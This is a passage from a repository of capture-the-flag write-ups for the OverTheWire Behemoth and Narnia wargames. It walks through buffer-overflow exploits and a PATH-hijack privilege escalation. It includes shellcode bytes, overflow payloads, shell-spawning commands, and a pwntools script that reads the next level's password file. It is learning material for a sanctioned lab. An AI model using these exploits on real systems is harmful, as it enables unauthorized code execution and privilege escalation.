32 | ``` 33 | 34 | Basically looks like [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0). Let's crack it open with a disassembler and look at main. 35 | 36 | ```asm 37 | main: 38 | 0804845d push ebp ; XREF=_start+23 39 | 0804845e mov ebp, esp 40 | 08048460 and esp, 0xfffffff0 41 | 08048463 sub esp, 0x60 42 | 08048466 mov dword [ss:esp], 0x8048530 ; "Password: ", argument "format" for method j_printf 43 | 0804846d call j_printf 44 | 08048472 lea eax, dword [ss:esp+0x1d] 45 | 08048476 mov dword [ss:esp], eax ; argument "str" for method j_gets 46 | 08048479 call j_gets 47 | 0804847e mov dword [ss:esp], 0x804853c ; "Authentication failure.\\nSorry.", argument "s" for method j_puts 48 | 08048485 call j_puts 49 | 0804848a mov eax, 0x0 50 | 0804848f leave 51 | 08048490 ret 52 | ; endp 53 | ``` 54 | 55 | Ok, this is kind of weird. It looks like the input read in isn't really stored anywhere and it immediately prints out ```Authentication failure``` after the call to ```j_gets```. Let's stuff a bunch of data in the input and cross our fingers. 56 | 57 | ``` 58 | # python -c 'print "A"*300' | ./behemoth1 59 | Password: Authentication failure. 60 | Sorry. 61 | Segmentation fault 62 | ``` 63 | 64 | Ah, ok, something to focus on. Let's have a look in ```gdb```. 65 | 66 | ``` 67 | # python -c 'print "A"*300' > input 68 | # gdb behemoth1 69 | (gdb) run < input 70 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 71 | Password: Authentication failure. 72 | Sorry. 73 | 74 | Program received signal SIGSEGV, Segmentation fault. 75 | 0x41414141 in ?? () 76 | ``` 77 | 78 | So we now know that we have control of the application, let's try to pinpoint where in our input is controlling that location. 79 | 80 | ``` 81 | # python -c 'print "A"*70' > input 82 | # gdb behemoth1 83 | ing program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 84 | Password: Authentication failure. 85 | Sorry. 
86 | [Inferior 1 (process 20488) exited normally] 87 | ``` 88 | 89 | ``` 90 | # python -c 'print "A"*80' > input 91 | # gdb behemoth1 92 | (gdb) run < input 93 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 94 | Password: Authentication failure. 95 | Sorry. 96 | > 97 | Program received signal SIGSEGV, Segmentation fault. 98 | 0xf7e20042 in ?? () from /lib/i386-linux-gnu/i686/cmov/libc.so.6 99 | ``` 100 | 101 | ``` 102 | # python -c 'print "A"*82' > input 103 | # gdb behemoth1 104 | (gdb) run < input 105 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 106 | Password: Authentication failure. 107 | Sorry. 108 | > 109 | Program received signal SIGSEGV, Segmentation fault. 110 | 0x00414141 in ?? () 111 | ``` 112 | 113 | ``` 114 | # python -c 'print "A"*83' > input 115 | # gdb behemoth1 116 | (gdb) run < input 117 | Starting program: /root/CTF/OverTheWire/behemoth/behemoth1 < input 118 | Password: Authentication failure. 119 | Sorry. 120 | > 121 | Program received signal SIGSEGV, Segmentation fault. 122 | 0x41414141 in ?? () 123 | ``` 124 | 125 | Ok, so at ```83``` characters we have completely overwritten that space: all four bytes of the saved return address now come from our input, which is why the final payload below uses ```79``` bytes of padding before the address. Now we need to figure out how to deliver the shellcode. Since nothing appears to actually be stored anywhere this could be tricky. How about we try and reuse some of the things we learned in the [narnia](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/) challenges. First off, let's try to pull off the same feat as [narnia8](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria8) and use an environment variable to store the shellcode. We learned in that challenge that the address will change outside of ```gdb```, so let's go ahead and stuff some ```nop``` values in there for a slide back down to the shellcode.
126 | 127 | ``` 128 | behemoth1@melinda:/behemoth$ export EGG=$(python -c 'print "\x90"*100+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 129 | behemoth1@melinda:/behemoth$ gdb behemoth1 130 | (gdb) break * 0x08048479 131 | Breakpoint 1 at 0x8048479 132 | (gdb) run 133 | Starting program: /games/behemoth/behemoth1 134 | > 135 | Breakpoint 1, 0x08048479 in main () 136 | (gdb) x/s *((char **)environ) 137 | 0xffffd835: "XDG_SESSION_ID=1977" 138 | (gdb) x/s *((char **)environ+1) 139 | 0xffffd849: "SHELL=/bin/bash" 140 | (gdb) x/s *((char **)environ+2) 141 | 0xffffd859: "TERM=xterm" 142 | (gdb) x/s *((char **)environ+3) 143 | 0xffffd864: "SSH_CLIENT=68.1.62.184 48350 22" 144 | (gdb) x/s *((char **)environ+4) 145 | 0xffffd884: "SSH_TTY=/dev/pts/3" 146 | (gdb) x/s *((char **)environ+5) 147 | 0xffffd897: "LC_ALL=C" 148 | (gdb) x/s *((char **)environ+6) 149 | 0xffffd8a0: "EGG=", '\220' , "\061\333\215C\027\231\315\200\061\311Qhn/shh//bi\215A\v\211\343\315\200" 150 | ̀" 151 | ``` 152 | 153 | Ok, now we have our shellcode loaded and we know it will be somewhere around ```0xffffd8a0```. Let's start brute forcing that address and see if we can hit our slide. 154 | 155 | ``` 156 | behemoth1@melinda:/behemoth$ python -c 'print "A"*79+"\xa0\xd8\xff\xff"' | ./behemoth1 157 | Password: Authentication failure. 158 | Sorry. 159 | Segmentation fault 160 | ``` 161 | 162 | ``` 163 | behemoth1@melinda:/behemoth$ python -c 'print "A"*79+"\xb0\xd8\xff\xff"' | ./behemoth1 164 | Password: Authentication failure. 165 | Sorry. 166 | ``` 167 | 168 | Ok, that one is different...but no command prompt. It seems like we hit our shellcode so let's try a few things. If you remember back to [narnia0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria0) we had a similiar problem where we should have gotten a prompt but the program just exited. Let's try to use the tricks we learned there. 
We'll use bash's subshell syntax by wrapping the input being piped in with parentheses and then following the printed payload with the ```cat``` command to try and force the prompt to stay open. 169 | 170 | ``` 171 | behemoth1@melinda:/behemoth$ (python -c 'print "A"*79+"\xb0\xd8\xff\xff"';cat) | ./behemoth1 172 | Password: Authentication failure. 173 | Sorry. 174 | whoami 175 | behemoth2 176 | cat /etc/behemoth_pass/behemoth2 177 | ********** 178 | ``` 179 | 180 | Sweet. I enjoyed this one since we got to reach back and utilize a lot of the methods that were learned in the previous series. Now behemoth2. 181 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth1/behemoth1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth1/behemoth1 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth2/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth2 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth2 6 | **Password:** see [behemoth1](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth1) 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation.
10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth2 17 | behemoth2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=490eca1266dce1c6fa5afd37392837976dba68ef, not stripped 18 | ``` 19 | ``` 20 | # ~/checksec.sh --file behemoth2 21 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 22 | Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH behemoth2 23 | ``` 24 | 25 | Ok, we have a couple protections enabled, but they didn't really play a role in [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0), so let's go ahead and dive in and see what this binary does. 26 | 27 | ``` 28 | # ./behemoth2 29 | Test 30 | ^C 31 | # ls 32 | 20977 behemoth2 33 | ``` 34 | 35 | Pretty weird. Didn't really do anything, but it did end up creating a file locally after I gave it some input. Let's see what the disassembly looks like. 
36 | 37 | ```asm 38 | main: 39 | 0804856d push ebp ; XREF=_start+23 40 | 0804856e mov ebp, esp 41 | 08048570 and esp, 0xfffffff0 42 | 08048573 sub esp, 0xa0 43 | 08048579 mov eax, dword [gs:0x14] 44 | 0804857f mov dword [ss:esp+0x9c], eax 45 | 08048586 xor eax, eax 46 | 08048588 call j_getpid 47 | 0804858d mov dword [ss:esp+0x1c], eax 48 | 08048591 lea eax, dword [ss:esp+0x24] 49 | 08048595 add eax, 0x6 50 | 08048598 mov dword [ss:esp+0x20], eax 51 | 0804859c mov eax, dword [ss:esp+0x1c] 52 | 080485a0 mov dword [ss:esp+0x8], eax 53 | 080485a4 mov dword [ss:esp+0x4], 0x804870c ; "touch %d", argument "format" for method j_sprintf 54 | 080485ac lea eax, dword [ss:esp+0x24] 55 | 080485b0 mov dword [ss:esp], eax ; argument "str" for method j_sprintf 56 | 080485b3 call j_sprintf 57 | 080485b8 lea eax, dword [ss:esp+0x38] 58 | 080485bc mov dword [ss:esp+0x4], eax ; argument #2 for method __lstat 59 | 080485c0 mov eax, dword [ss:esp+0x20] 60 | 080485c4 mov dword [ss:esp], eax ; argument #1 for method __lstat 61 | 080485c7 call __lstat 62 | 080485cc and eax, 0xf000 63 | 080485d1 cmp eax, 0x8000 64 | 080485d6 je 0x80485f0 65 | 66 | 080485d8 mov eax, dword [ss:esp+0x20] 67 | 080485dc mov dword [ss:esp], eax ; argument "path" for method j_unlink 68 | 080485df call j_unlink 69 | 080485e4 lea eax, dword [ss:esp+0x24] 70 | 080485e8 mov dword [ss:esp], eax ; argument "command" for method j_system 71 | 080485eb call j_system 72 | 73 | 080485f0 mov dword [ss:esp], 0x7d0 ; argument "seconds" for method j_sleep, XREF=main+105 74 | 080485f7 call j_sleep 75 | 080485fc lea eax, dword [ss:esp+0x24] 76 | 08048600 mov dword [ds:eax], 0x20746163 77 | 08048606 mov byte [ds:eax+0x4], 0x0 78 | 0804860a mov byte [ss:esp+0x28], 0x20 79 | 0804860f lea eax, dword [ss:esp+0x24] 80 | 08048613 mov dword [ss:esp], eax ; argument "command" for method j_system 81 | 08048616 call j_system 82 | 0804861b mov eax, 0x0 83 | 08048620 mov edx, dword [ss:esp+0x9c] 84 | 08048627 xor edx, dword [gs:0x14] 85 | 
0804862e je 0x8048635 86 | 87 | 08048630 call j___stack_chk_fail 88 | 89 | 08048635 leave ; XREF=main+193 90 | 08048636 ret 91 | ; endp 92 | ``` 93 | 94 | Ok, we have a few things to track down here. We can see a call to ```getpid```, ```sprintf```, ```lstat```, ```unlink```, ```system```, and ```sleep```. I'm not 100% sure what ```lstat``` and ```unlink``` do, so let's take a look at them first. Starting with ```lstat```, we can see that it is used to determine information about a file based on its filename. Next we have ```unlink``` which appears to remove a link to a file if it exists. 95 | 96 | We can follow the assembly here a little, but let's see what [Hopper](http://www.hopperapp.com) will give us for the pseudocode. 97 | 98 | ```C 99 | int main(int arg0) { 100 | esp = (esp & 0xfffffff0) - 0xa0; 101 | getpid(); 102 | eax = *(esp + 0x1c); 103 | sprintf(esp + 0x24, "touch %d", eax); 104 | if ((__lstat(*(esp + 0x20), esp + 0x38) & 0xf000) != 0x8000) { 105 | eax = *(esp + 0x20); 106 | unlink(eax); 107 | system(esp + 0x24); 108 | } 109 | sleep(0x7d0); 110 | *(esp + 0x24) = 0x20746163; 111 | *(int8_t *)(esp + 0x28) = 0x0; 112 | system(esp + 0x24); 113 | eax = 0x0; 114 | edx = *(esp + 0x9c); 115 | edx = edx ^ *0x14; 116 | COND = edx == 0x0; 117 | if (!COND) { 118 | eax = __stack_chk_fail(); 119 | } 120 | return eax; 121 | } 122 | ``` 123 | 124 | We can see that both calls to system, which is most likely where we want to be, are using ```esp + 0x24``` as their parameter. Looking at the line ```sprintf(esp + 0x24, "touch %d", eax);``` it looks as though ```esp + 0x24``` should be the string ```touch <pid>``` where ```<pid>``` is the actual process id. This also explains why we were seeing weird files being generated upon execution. Since ```system()``` hands that string to ```/bin/sh -c```, the bare command name ```touch``` is resolved by the shell using the environment the setuid binary inherited from us, which is the weak point here. Now, we need to figure out how to take over that command in order to try and get a shell. So, in general, how does the system know where the ```touch``` command is?
It's not in the local directory, and even if it were you would need ```./touch``` to call it. So this all ties back to the ```PATH``` environment variable. If you look up the definition of what the ```PATH``` variable is you'll find this or something similar: 125 | >"PATH is an environmental variable in Linux and other Unix-like operating systems that tells the shell which directories to search for executable files (i.e., ready-to-run programs) in response to commands issued by a user." 126 | So let's look at our ```PATH``` and see where the system is looking for the command ```touch```. 127 | 128 | ``` 129 | # echo $PATH 130 | /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 131 | # whereis touch 132 | touch: /usr/bin/touch /bin/touch /usr/share/man/man1/touch.1.gz 133 | ``` 134 | 135 | If we look at where ```touch``` actually exists on the system and then at which entry of the ```PATH``` is the first to contain one of those locations, we will see that ```touch``` is actually being called from ```/usr/bin```. We should be able to create our own ```touch``` command and add its location to the beginning of the ```PATH```, or at least before ```/usr/bin``` in the path, and our command should be used. Let's try. 136 | 137 | ``` 138 | # echo /bin/dash > touch 139 | # cat touch 140 | /bin/dash 141 | # chmod +x touch 142 | # ./touch 143 | $ whoami 144 | root 145 | ``` 146 | 147 | I changed the actual prompt so you could see the difference, but after creating a new script called ```touch``` that executes a new shell I ran it to make sure everything was working correctly. Now let's update our ```PATH``` and try to re-run ```behemoth2```.
148 | 149 | ``` 150 | # export PATH=~/CTF/OverTheWire/behemoth/:$PATH 151 | # echo $PATH 152 | /root/CTF/OverTheWire/behemoth/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 153 | # ./behemoth2 154 | $ whoami 155 | root 156 | ``` 157 | 158 | So we can see that by adding the directory of our newly created ```touch``` command to the beginning of the ```PATH``` we have taken over that command, and now instead of an arbitrary file being created we are greeted with a shell. Let's head to the server and see if we can duplicate it without too much trouble. 159 | 160 | ``` 161 | behemoth2@melinda:/behemoth$ mktemp -d 162 | /tmp/tmp.T2jaQATLdj 163 | behemoth2@melinda:/behemoth$ echo /bin/dash > /tmp/tmp.T2jaQATLdj/touch 164 | behemoth2@melinda:/behemoth$ chmod +x /tmp/tmp.T2jaQATLdj/touch 165 | behemoth2@melinda:/behemoth$ export PATH=/tmp/tmp.T2jaQATLdj:$PATH 166 | behemoth2@melinda:/behemoth$ ./behemoth2 167 | touch: cannot touch '6686': Permission denied 168 | ``` 169 | 170 | Hmmm, it looks like the new ```PATH``` wasn't used. Let's verify everything. 171 | 172 | ``` 173 | behemoth2@melinda:/behemoth$ echo $PATH 174 | /tmp/tmp.T2jaQATLdj:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games 175 | behemoth2@melinda:/behemoth$ ls /tmp/tmp.T2jaQATLdj 176 | touch 177 | behemoth2@melinda:/behemoth$ /tmp/tmp.T2jaQATLdj/touch 178 | $ 179 | ``` 180 | 181 | Well that worked (as ```behemoth2```, anyway)... 182 | 183 | Wouldn't be the first time we've had permission issues. The directory ```mktemp -d``` created is only accessible to its owner (mode ```0700```), so a process running as ```behemoth3``` can't search it; the shell skips that ```PATH``` entry and falls through to the real ```/usr/bin/touch```, which then fails to create a file in ```/behemoth```. Let's make sure ```behemoth3``` has access to our ```touch``` command.
184 | 185 | ``` 186 | behemoth2@melinda:/behemoth$ chmod 777 /tmp/tmp.T2jaQATLdj/ 187 | behemoth2@melinda:/behemoth$ ./behemoth2 188 | $ whoami 189 | behemoth3 190 | $ cat /etc/behemoth_pass/behemoth3 191 | ********** 192 | ``` 193 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth2/behemoth2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth2/behemoth2 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth3/behemoth3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth3/behemoth3 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Narnia0 3 | 4 | narnia.labs.overthewire.org 5 | 6 | **Username:** narnia0 7 | **Password:** narnia0 8 | **Description:** 9 | 10 | This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 11 | 12 | ##Write-up 13 | 14 | Before we do anything, let's go ahead and run the program and see what it does. 15 | 16 | ``` 17 | # ./narnia0 18 | Correct val's value from 0x41414141 -> 0xdeadbeef! 19 | Here is your chance: AAAAAAAA 20 | buf: AAAAAAAA 21 | val: 0x41414141 22 | WAY OFF!!!! 23 | ``` 24 | 25 | Ok, it basically just tell's us that we need to correct a value and asks for input. 
After accepting the input it looks like it just tells us the value that we submitted and the value of the area we are supposed to overwrite. 26 | 27 | Let's go ahead and take a peek at the source: 28 | 29 | ```C 30 | /* 31 | This program is free software; you can redistribute it and/or modify 32 | it under the terms of the GNU General Public License as published by 33 | the Free Software Foundation; either version 2 of the License, or 34 | (at your option) any later version. 35 | 36 | This program is distributed in the hope that it will be useful, 37 | but WITHOUT ANY WARRANTY; without even the implied warranty of 38 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 39 | GNU General Public License for more details. 40 | 41 | You should have received a copy of the GNU General Public License 42 | along with this program; if not, write to the Free Software 43 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 44 | */ 45 | #include 46 | #include 47 | 48 | int main(){ 49 | long val=0x41414141; 50 | char buf[20]; 51 | 52 | printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); 53 | printf("Here is your chance: "); 54 | scanf("%24s",&buf); 55 | 56 | printf("buf: %s\n",buf); 57 | printf("val: 0x%08x\n",val); 58 | 59 | if(val==0xdeadbeef) 60 | system("/bin/sh"); 61 | else { 62 | printf("WAY OFF!!!!\n"); 63 | exit(1); 64 | } 65 | 66 | return 0; 67 | } 68 | ``` 69 | 70 | Alright, we can see the declaration of the buffer ```char buf[20];``` and where the input is read in ```scanf("%24s",&buf);```. The ```%24s``` width lets ```scanf``` write up to 24 characters (plus a terminating NUL) into a 20-byte buffer, so the last few bytes of the input land in whatever sits just above ```buf``` on the stack, which here is ```val```. It also looks like if we get our values correct that we will be rewarded quite generously with a shell. How nice! Let's play around with this new information a bit. If the buffer is only supposed to hold 20 characters, let's see what happens when our input is 21 characters, but since it looks like the buffer we want to overwrite has ```0x41414141``` already in it we are going to have to use another letter besides ```A``` as our input.
We'll settle for ```R```. Just as a quick side note, rather than inputting the values by hand each time let's utilize python to make life easier and just pipe in the input. 71 | 72 | ``` 73 | # python -c 'print "R"*21' | ./narnia0 74 | Correct val's value from 0x41414141 -> 0xdeadbeef! 75 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRR 76 | val: 0x41410052 77 | WAY OFF!!!! 78 | ``` 79 | 80 | Hmm, it looks like we overwrote one character with the null value at the end of the input overwriting a second. It also looks like it started overwriting from the back, so we'll need to remember to take the endianness into account for our final input. Let's try overwriting all 4 characters of the buffer. 81 | 82 | ``` 83 | # python -c 'print "R"*24' | ./narnia0 84 | Correct val's value from 0x41414141 -> 0xdeadbeef! 85 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRRRRR 86 | val: 0x52525252 87 | WAY OFF!!!! 88 | ``` 89 | 90 | Perfect, we overwrote the whole buffer with our input. Now, lets start trying to fit ```0xdeadbeef``` in there. Since the hex values for ```0xdeadbeef``` don't match up to ascii characters we need a way to insert them as input. We are already using python for the repetitive input, let's just back off our number of ```R``` and tag on hex values to the end of that string and see what it does. 91 | 92 | ``` 93 | # python -c 'print "R"*20+"\xde\xad\xbe\xef"' | ./narnia0 94 | Correct val's value from 0x41414141 -> 0xdeadbeef! 95 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRޭ� 96 | val: 0xefbeadde 97 | WAY OFF!!!! 98 | ``` 99 | Our buffer shows that we inserted ```RRRRRRRRRRRRRRRRRRRRޭ�``` which we obviously wouldn't have been able to type in. However, we forget about the little endian part and our values aren't in the correct order. Let's fix that. 100 | 101 | ``` 102 | # python -c 'print "R"*20+"\xef\xbe\xad\xde"' | ./narnia0 103 | Correct val's value from 0x41414141 -> 0xdeadbeef! 
104 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRᆳ 105 | val: 0xdeadbeef 106 | ``` 107 | 108 | Well, we didn't get the ```WAY OFF!!!``` message, but no shell. I actually spent a good bit of time at this stage, but learned a few key concepts in doing so. The shell is being launched, but it inherits its standard input from the pipe, and by the time it starts ```python``` has already finished writing, so the shell reads end-of-file and exits before we have a chance to run anything. What we need to do is use the subshell syntax in bash and group commands together so that the pipe stays open. Let's try that with a basic command. 109 | 110 | ``` 111 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';ls) | ./narnia0 112 | Correct val's value from 0x41414141 -> 0xdeadbeef! 113 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 114 | val: 0xdeadbeef 115 | /bin/sh: 1: narnia0: not found 116 | /bin/sh: 2: narnia0.c: not found 117 | /bin/sh: 3: narnia1: not found 118 | /bin/sh: 4: narnia1.c: not found 119 | /bin/sh: 5: narnia2: not found 120 | /bin/sh: 6: narnia2.c: not found 121 | /bin/sh: 7: narnia3: not found 122 | /bin/sh: 8: narnia3.c: not found 123 | /bin/sh: 9: narnia4: not found 124 | /bin/sh: 10: narnia4.c: not found 125 | /bin/sh: 11: narnia5: not found 126 | /bin/sh: 12: narnia5.c: not found 127 | /bin/sh: 13: narnia6: not found 128 | /bin/sh: 14: narnia6.c: not found 129 | /bin/sh: 15: narnia7: not found 130 | /bin/sh: 16: narnia7.c: not found 131 | /bin/sh: 17: narnia8: not found 132 | /bin/sh: 18: narnia8.c: not found 133 | ``` 134 | 135 | Now this looks a little better. It looks like the output from ```ls``` was passed as commands into the /bin/sh spawned by narnia0, which is why every filename shows up as a "not found" command. Here we can utilize the ```cat``` command with no parameters, which keeps our terminal's input connected to the pipe so we can pass commands to /bin/sh. 136 | 137 | ``` 138 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';cat) | ./narnia0 139 | Correct val's value from 0x41414141 -> 0xdeadbeef!
140 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 141 | val: 0xdeadbeef 142 | whoami 143 | narnia1 144 | pwd 145 | /narnia 146 | ``` 147 | 148 | Finally. The ```cat``` command left the input open for us and everything we passed was executed by /bin/sh as a separate command. Now we just need to find where the flag may be. 149 | 150 | ``` 151 | narnia0@melinda:/narnia$ find / -name 'narnia*' -print 2>/dev/null 152 | /games/narnia 153 | /games/narnia/narnia8 154 | /games/narnia/narnia6.c 155 | /games/narnia/narnia6 156 | /games/narnia/narnia3 157 | /games/narnia/narnia7 158 | /games/narnia/narnia4 159 | /games/narnia/narnia2.c 160 | /games/narnia/narnia3.c 161 | /games/narnia/narnia1 162 | /games/narnia/narnia5 163 | /games/narnia/narnia4.c 164 | /games/narnia/narnia5.c 165 | /games/narnia/narnia0 166 | /games/narnia/narnia2 167 | /games/narnia/narnia1.c 168 | /games/narnia/narnia7.c 169 | /games/narnia/narnia8.c 170 | /games/narnia/narnia0.c 171 | /etc/narnia_pass 172 | /etc/narnia_pass/narnia3 173 | /etc/narnia_pass/narnia7 174 | /etc/narnia_pass/narnia5 175 | /etc/narnia_pass/narnia1 176 | /etc/narnia_pass/narnia8 177 | /etc/narnia_pass/narnia6 178 | /etc/narnia_pass/narnia9 179 | /etc/narnia_pass/narnia0 180 | /etc/narnia_pass/narnia2 181 | /etc/narnia_pass/narnia4 182 | /narnia 183 | /home/narnia3 184 | /home/narnia7 185 | /home/narnia5 186 | /home/narnia1 187 | /home/narnia8 188 | /home/narnia6 189 | /home/narnia9 190 | /home/narnia0 191 | /home/narnia2 192 | /home/narnia4 193 | ``` 194 | 195 | The ```find / -name 'narnia*'``` is a fairly basic command. The ```-print``` just outputs each match, and the ```2>/dev/null``` is there to discard the permission errors that would otherwise clutter the output. Out of our results the most promising is the ```/etc/narnia_pass``` directory, which looks like it holds a password file for each challenge. Since we already have the password for narnia0, let's try to grab the narnia1 password.
196 | 197 | ``` 198 | narnia0@melinda:/narnia$ cat /etc/narnia_pass/narnia1 199 | cat: /etc/narnia_pass/narnia1: Permission denied 200 | narnia0@melinda:/narnia$ ls -l /etc/narnia_pass/narnia1 201 | -r-------- 1 narnia1 narnia1 11 Nov 14 2014 /etc/narnia_pass/narnia1 202 | narnia0@melinda:/narnia$ ls -l narnia0 203 | -r-sr-x--- 1 narnia1 narnia0 7452 Nov 14 2014 narnia0 204 | ``` 205 | 206 | We can't just ```cat``` the narnia1 password because we don't have permissions, but the ```s``` in ```-r-sr-x---``` shows that the narnia0 binary is setuid and owned by narnia1, so the shell it spawns runs with narnia1's privileges. Let's use our subshell trick and try to read the password. 207 | 208 | ``` 209 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';cat) | ./narnia0 210 | Correct val's value from 0x41414141 -> 0xdeadbeef! 211 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 212 | val: 0xdeadbeef 213 | cat /etc/narnia_pass/narnia1 214 | ********** 215 | ``` 216 | 217 | There we go. Finally got it. On to narnia1. 218 | 219 | As a follow-up, I wanted to work my way back through these challenges implementing the solutions with the [pwntools](http://pwntools.com) python module in an effort to sharpen my python skills and learn how to utilize this module for future CTF fun.
Below is my solution: 220 | 221 | ```python 222 | from pwn import * 223 | 224 | context(arch='i386', os='linux') 225 | s = ssh(user='narnia0', host='narnia.labs.overthewire.org', password='narnia0') 226 | sh = s.run('/narnia/narnia0') 227 | sh.sendline('A'*20 + p32(0xdeadbeef)) 228 | sh.sendline('cat /etc/narnia_pass/narnia1') 229 | log.info('Flag: '+sh.recvline().split('\n')[0]) 230 | s.close() 231 | ``` 232 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/narnia0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Naria0/narnia0 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/narnia0.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 
11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | 19 | int main(){ 20 | long val=0x41414141; 21 | char buf[20]; 22 | 23 | printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); 24 | printf("Here is your chance: "); 25 | scanf("%24s",&buf); 26 | 27 | printf("buf: %s\n",buf); 28 | printf("val: 0x%08x\n",val); 29 | 30 | if(val==0xdeadbeef) 31 | system("/bin/sh"); 32 | else { 33 | printf("WAY OFF!!!!\n"); 34 | exit(1); 35 | } 36 | 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia1 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia1 6 | **Password:** see [narnia0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria0) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Again, let's go ahead and run the program and see what it does. 13 | > 14 | >``` 15 | # ./narnia1 16 | Give me something to execute at the env-variable EGG 17 | >``` 18 | > Ok, it looks like we are going to be messing with environment variables. 19 | > 20 | > Let's go ahead and take a peek at the source: 21 | > 22 | >```C 23 | >/* 24 | > This program is free software; you can redistribute it and/or modify 25 | > it under the terms of the GNU General Public License as published by 26 | > the Free Software Foundation; either version 2 of the License, or 27 | > (at your option) any later version. 
